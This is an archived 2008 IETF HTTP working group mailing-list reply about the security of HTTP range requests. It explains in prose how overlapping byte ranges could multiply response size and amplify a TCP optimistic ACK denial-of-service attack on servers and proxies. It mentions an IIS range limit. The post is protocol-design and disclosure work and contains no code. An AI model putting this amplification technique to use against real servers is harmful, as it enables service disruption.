- From: Stefanos Harhalakis <v13@v13.gr>
- Date: Sun, 12 Oct 2008 21:21:43 +0300
- To: Julian Reschke <julian.reschke@gmx.de>
- Cc: ietf-http-wg@w3.org
Hello Julian, On Saturday 11 October 2008, Julian Reschke wrote: > V13 wrote: > > Allowing overlapping ranges permits the client side to request more data > > than the largest file available at the server side. It is trivial to > > construct a 100MB file request from 200 overlapping partial requests of a > > 500K file. This allows the TCP optimistic ACK attack [1] to be performed > > on web servers all over the world. > > I agree that this is a nice DOS scenario, but wouldn't it be possible to > do the same just with a bunch of concurrent, repeating GET requests on > the same URI? Indeed, repeated GET requests will have the same result but they will be a bit less robust. For every repeated request that the client side transmits there is a (not so small) possibility of the request being lost. If this problem is of size X then it is practically multiplied by the number of repeated ranges that the client side may request. Also, I can't think of a method for avoiding repeated requests without making the server side somehow vulnerable to a connection with 1 million 1-byte requests, unless there is a maximum request limit. p.s.1 This attack also affects proxies. p.s.2 IIS seems to limit the number of ranges per request to ~5 (I don't remember the exact number).
Received on Sunday, 12 October 2008 18:22:36 UTC